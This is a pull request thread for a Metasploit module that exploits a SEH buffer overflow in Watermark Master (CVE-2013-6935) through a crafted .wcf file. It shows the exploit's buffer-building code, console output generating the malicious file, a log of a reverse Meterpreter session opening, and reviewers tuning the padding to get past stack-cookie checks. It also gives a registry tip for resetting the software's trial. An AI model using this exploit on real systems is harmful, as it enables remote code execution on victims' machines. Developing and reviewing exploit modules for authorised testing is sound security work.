### PR TITLE
Add Watermark Master Fileformat Exploit

### PR DESCRIPTION
**Pull request by jakxx**
PR to add Watermark Master Fileformat Buffer Overflow Exploit (SEH).

Exploit overwrites SEH chain to hit shellcode.

CVE: 2013-6935
Vendor Homepage: http://www.videocharge.com
Original Advisory: https://www.exploit-db.com/exploits/29327/
Installer: https://www.exploit-db.com/apps/17c031722e03c01f7108d7d23a8ae609-WatermarkMaster_Install.exe
Tested on: Windows 7 x32
Bonus points: The application runs as a mandatory high integrity process :)

Usage:
Install target software
Run module
Open generated .wcf file with File->Open

Console Output:

```
msf > use exploit/watermark_master 
msf exploit(watermark_master) > show options

Module options (exploit/watermark_master):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.wcf          no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   Watermark Master 2.2.23


msf exploit(watermark_master) > set payload windows/exec
payload => windows/exec
msf exploit(watermark_master) > set cmd mspaint.exe
cmd => mspaint.exe
msf exploit(watermark_master) > exploit

[*] Creating 'msf.wcf' file ...
[+] msf.wcf stored at /root/.msf4/local/msf.wcf
msf exploit(watermark_master) > 
```

### CODE REVIEW

File: modules/exploits/windows/fileformat/watermark_master.rb [hunk 1]
```diff
@@ -0,0 +1,93 @@
...
+
+  end
+
+  def exploit
+
+    buffer = rand_text(target['Offset'])
+    buffer << generate_seh_record(target.ret)
+    buffer << make_nops(100)
+    buffer << payload.encoded
+    buffer << rand_text(10000)
```
Comment (FireFart) [inline modules/exploits/windows/fileformat/watermark_master.rb]: if you add the 10k to the payload space, remove the 100 nops and set `'DisableNops' => false` it should fill up correctly.

With auto added nops the generated payload would look like:
* make_nops(space - payload.length)
* payload

Can you try if this works for this exploit?
Buffer would be
```
      buffer = rand_text(target['Offset'])
      buffer << generate_seh_record(target.ret)
      buffer << payload.encoded
```

File: modules/exploits/windows/fileformat/watermark_master.rb [hunk 2]
```diff
@@ -0,0 +1,93 @@
...
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '99226' ],
+          [ 'CVE', '2013-6935'],
+          [ 'EBD', '29327' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunc' => 'process',
```
Comment (FireFart) [inline modules/exploits/windows/fileformat/watermark_master.rb]: this should be `EXITFUNC` (uppercase)

File: modules/exploits/windows/fileformat/watermark_master.rb (hunk 1 above)
Comment (jakxx) [inline modules/exploits/windows/fileformat/watermark_master.rb]: I am able to make this method work. Seems I do not need the 10k filler after all!

**Comment by FireFart** [comment]
@jakxx I'm always getting the following message (even if i replace the buffer with a bunch of As):
screen shot 2015-08-18 at 21 31 32

**Comment by jakxx** [comment]
@FireFart Are you double clicking the generated file or doing file->open?

**Comment by FireFart** [comment]
@jakxx getting the error with file --> open and via the "wizard" open on startup

**Comment by jakxx** [comment]
@FireFart hmm... Weird. I will double check this tonight.

**Comment by FireFart** [comment]
@jakxx cool thx!

**Comment by jakxx** [comment]
Still getting successful shellcode exec. Here are my steps:

1) open binary and select "try"



2) either select "create new config" or just close out the config popup



3) File -> Open and select generated WCF file

**Comment by FireFart** [comment]
will try it again with a fresh windows vm next week

**Comment by jakxx** [comment]
Awesome, thanks. Let me know if you still run into issues and I will try to reproduce again.

**Comment by FireFart** [comment]
@jakxx i just installed a fresh windows 7 SP1 x64 VM and still getting this error

**Comment by FireFart** [comment]
@jakxx same goes for Windows 7 Prof SP1 x86

**Comment by jakxx** [comment]
Thanks for helping test @FireFart. Will look into this tonight with a fresh install too.

**Comment by FireFart** [comment]
PS: I used the installer from your PR description

**Comment by jakxx** [comment]
Gotcha. I will be sure to do the same as well.

**Comment by jakxx** [comment]
@FireFart I am still able to get windows/exec and windows/meterpreter/reverse_tcp paylods to execute with a vanilla Win7 x32, but I am seeing the error on the x64 install. I will see if I can get the x64 working tonight.

**Comment by wchen-r7** [comment]
Applying a delayed label while we wait for @jakxx's results.

**Comment by jakxx** [comment]
@wchen-r7 Sorry for the delay. Corelan class took up most of my week. Will try to add the x64 target to the module this week, but mabye we could get one more person to try out the x32 target currently implemented? @FireFart and I are getting inconsistent results somehow...

**Comment by wchen-r7** [comment]
@jakxx No problem with the delay. I'll try to test the x32.

**Comment by FireFart** [comment]
PS: Looks like the message is caused by the `/GS` compile time switch:
https://msdn.microsoft.com/en-us/library/aa290051%28v=vs.71%29.aspx

**Comment by jakxx** [comment]
Good find. Looks like the buffer is not writing past the stack cookie. Thanks.

**Comment by jakxx** [comment]
Somewhere between the stack cookie and the exception handler rather...

**Comment by FireFart** [comment]
Quick Note: To reset trial period delete `HKLM\SOFTWARE\Wow6432Node\VideoCharge Software\Watermark Master\Activation` or `HKLM\SOFTWARE\VideoCharge Software\Watermark Master\Activation` (depending on your architecture)

**Comment by jakxx** [comment]
The most recent commit should address the issues. Let me know if you guys are still have problems with the exploit.

**Comment by FireFart** [comment]
Still getting the buffer overrun message :( did you had time yet to test this @wchen-r7 ? Curious if this is a failure in my test environment o_O

**Comment by wchen-r7** [comment]
@FireFart it works for me, actually:

```
msf exploit(watermark_master) > run

[*] Creating 'msf.wcf' file ...
[+] msf.wcf stored at /Users/wchen/.msf4/local/msf.wcf
msf exploit(watermark_master) > back
msf > use exploit/multi/handler 
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 192.168.1.188
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.188:49428) at 2015-10-05 15:12:19 -0500

meterpreter > 


```

**Comment by FireFart** [comment]
@wchen-r7 strange i just did a fresh install with `SW_DVD5_Win_Pro_7w_SP1_32BIT_English_-2_MLF_X17-59276.ISO` (WIN7 Prof SP1) in parallels desktop and still getting this error o_O I don't get it....

**Comment by wchen-r7** [comment]
@FireFart So it looks like the BoF is due to the use of WideCharToMultiByte, specifically this one:

screen shot 2015-10-05 at 3 58 10 pm

You never get out of WideCharToMultiByte. It will keep copying until it hits an access violation, and that's when the exploit gains code execution. If this doesn't happen, I do see a cookie check at the end of the function, so I wonder if that's the one you're hitting:

screen shot 2015-10-05 at 4 01 43 pm

**Comment by jakxx** [comment]
@FireFart  @wchen-r7 That would make sense, especially given the error it throws. Its like its overwriting the stack cookie but not making it to the SEH chain for some reason...

**Comment by wchen-r7** [comment]
Yeah, no violation occurs before the cookie check on @FireFart's box for some reason. I would check WideCharToMultiByte first - the arguments, and whether it finishes or not.

**Comment by FireFart** [comment]
@jakxx @wchen-r7 now used a fresh win7x64 VM and got it working by changing `buffer << rand_text(9000)` to `buffer << rand_text(15000)`. Can you please confirm this?

**Comment by wchen-r7** [comment]
@FireFart 15000 works for me. I recommend this though:

```
    buffer = rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    buffer << rand_text(15000 - buffer.length)
```

That way the buffer is always 15000 bytes, and won't change due to whatever the payload is.

**Comment by FireFart** [comment]
@wchen-r7 thanks for testing! I wonder if there is a way to use Space=15000 and DisableNops=false properties for this one. Is there a way to swap the value of `payload.encoded` from currently "nops + exploit" to "exploit + nops"?

**Comment by jakxx** [comment]
@FireFart @wchen-r7 Yep, 15000 works for me as well. I will make the buffer change shortly to rand_text(15000 - buffer.length) unless I hear different.

**Comment by wchen-r7** [comment]
@FireFart If you set Payload Space to 15000, the actual size is 15524. I don't think it's quite the same as Buffer Space.

**Comment by FireFart** [comment]
ok so let's change it to `rand_text(15000 - buffer.length)` and we are good to merge :)

**Comment by FireFart** [comment]
@wchen-r7 @jakxx sorry just tested it again on x64 and 15000 also runs into the stack cookie.
But `buffer << rand_text(18000 - buffer.length)` works

**Comment by FireFart** [comment]
@wchen-r7 @jakxx Ok I think I identified some of the problems. It looks like it depends on the path where you load the file and how you load it. If I load it from a network share with a double click 18k works, if I load it from the users desktop I can run it with 15k.
If i load it through the file open dialog, only 18k works

**Comment by wchen-r7** [comment]
aim high!

**Comment by jakxx** [comment]
Haha Interesting. I have only been running via file->open.

So I will just update to <code>rand_text(15000 - buffer.length)</code> ?

**Comment by jakxx** [comment]
Whoops, I meant <code> rand_text(18000 - buffer.length)</code>

**Comment by FireFart** [comment]
jeah i would go for 18k if it works on your machines too

**Comment by jakxx** [comment]
yep, 18k works for me. Updating...

**Comment by wchen-r7** [comment]
15000 works for me for either opening via the menu, or double-clicking. But a bigger buffer shouldn't be a problem.

**Comment by wchen-r7** [comment]
code looks good. @FireFart please feel free to merge.

**Comment by FireFart** [comment]
thx @jakxx for your patience on my f***** up system on this :)

**Comment by jakxx** [comment]
@wchen-r7 @FireFart thanks all! Haha no problem @FireFart this app was quite picky :)

**Pull request merged**